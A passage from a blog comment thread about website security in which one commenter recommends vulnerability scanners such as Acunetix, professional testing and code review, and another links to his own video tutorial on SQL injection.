    There are some scanners available that will scan the website and tell you if they’ve detected any type of weakness (injection, XSS, etc…). If you search around online you should be able to find some free ones and some others that require you to purchase a license. There’s one called Acunetix that allows you to do XSS scanning for free but you must buy a license to do the other scans. The other option you have is to hire someone who has experience with testing a solution and providing detailed reports on security concerns. Typically a scan of a website isn’t enough to ensure it’s secure. (As secure as it can be) A code review should be undertaken as well as security scans.

    Hope that helps – good luck.

    Thanks,
    Dave

  73. Alex Says:

    Hi!

    I created a video tutorial about SQL injection.
    Take a look:

    http://www.webmastervideoschool.com/blog_item.php?id=7
